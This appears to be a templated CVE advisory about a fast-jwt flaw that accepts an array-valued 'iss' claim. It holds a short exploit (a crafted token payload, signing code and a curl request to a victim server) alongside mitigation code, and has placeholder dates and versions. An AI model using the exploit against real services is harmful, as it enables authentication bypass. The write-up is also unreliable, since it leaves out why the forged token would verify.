How the CVE Works:
The vulnerability in the `fast-jwt` library arises from improper validation of the `iss` (issuer) claim in JSON Web Tokens (JWTs). According to RFC 7519, the `iss` claim must be a single string value. However, `fast-jwt` incorrectly accepts an array of strings as a valid `iss` value. This flaw allows an attacker to craft a malicious JWT with an `iss` claim containing both a legitimate issuer (e.g., `https://valid-iss`) and an attacker-controlled domain (e.g., `https://attacker-domain/`). When the JWT is validated by `fast-jwt`, the library mistakenly considers it valid, enabling the attacker to bypass issuer validation checks. This can lead to unauthorized access or privilege escalation if the application relies on `fast-jwt` for JWT validation.
DailyCVE Form:
Platform: Node.js
Version: fast-jwt (affected versions)
Vulnerability: JWT Issuer Claim Validation
Severity: Critical
Date: 2023-XX-XX
What Undercode Say:
Exploitation:
- Crafting Malicious JWT: An attacker creates a JWT with an `iss` claim containing an array of strings, including their domain and the legitimate issuer.

```json
{ "iss": ["https://valid-iss", "https://attacker-domain/"], "sub": "user", "exp": 1735689600 }
```

- Signing the JWT: The attacker signs the JWT using their private key.

```javascript
const fs = require('fs');
const jwt = require('jsonwebtoken');

// Payload from the previous step
const payload = { iss: ['https://valid-iss', 'https://attacker-domain/'], sub: 'user', exp: 1735689600 };
// The signer's own RSA private key in PEM format (path is a placeholder)
const privateKey = fs.readFileSync('private.pem');
const maliciousToken = jwt.sign(payload, privateKey, { algorithm: 'RS256' });
```

- Sending the JWT: The attacker sends the malicious JWT to the victim server.

```bash
curl -X GET http://victim-server/auth -H "Authorization: Bearer $maliciousToken"
```
Protection:
- Update `fast-jwt`: Ensure the library is updated to a patched version that enforces single-string `iss` validation.

```bash
npm update fast-jwt
```
- Custom Validation: Implement custom validation logic to reject JWTs with array-based `iss` claims, independently of what the library accepts.

```javascript
const { createVerifier } = require('fast-jwt');

const ALLOWED_ISS = 'https://valid-iss';
// keyFetcher is the application's existing key lookup function (assumed to be defined elsewhere);
// a function key makes the returned verifier asynchronous
const jwtVerifier = createVerifier({ key: keyFetcher, allowedIss: ALLOWED_ISS });

// Wrap the library verifier so a non-string or non-matching iss is rejected
// even if the library itself lets it through
async function verifyStrictIss(token) {
  const payload = await jwtVerifier(token);
  if (typeof payload.iss !== 'string' || payload.iss !== ALLOWED_ISS) {
    throw new Error('Invalid iss claim');
  }
  return payload;
}
```
- Use Secure Libraries: Replace `fast-jwt` with a more secure JWT library like `jsonwebtoken` or `jose`.

```bash
npm install jsonwebtoken
```
- Monitor Logs: Regularly monitor server logs for unusual JWT validation patterns.
```bash
tail -f /var/log/auth.log | grep "JWT validation failed"
```
Additional Commands:
- Check Installed Version:
```bash
npm list fast-jwt
```
- Test JWT Validation:
```javascript
// A fast-jwt verifier throws on an invalid token rather than returning a falsy value,
// so the result must be checked with try/catch
try {
  const payload = await jwtVerifier(maliciousToken);
  console.log('JWT is valid', payload);
} catch (err) {
  console.log('JWT is invalid:', err.message);
}
```
Code Snippets:
- Patch for `fast-jwt`:

```javascript
// In verifier.js, replace the iss validation logic
if (Array.isArray(iss)) {
  throw new Error('iss claim must be a string');
}
```
- Secure JWT Generation:
```javascript
const fs = require('fs');
const jwt = require('jsonwebtoken');

// The issuer's RSA private key in PEM format (path is a placeholder)
const privateKey = fs.readFileSync('private.pem');
// iss is a single string, as RFC 7519 requires
const secureToken = jwt.sign({ iss: 'https://valid-iss' }, privateKey, { algorithm: 'RS256' });
```
By following these steps, developers can mitigate the risk posed by this critical vulnerability and ensure secure JWT validation in their applications.
References:
Reported By: https://github.com/advisories/GHSA-gm45-q3v2-6cf8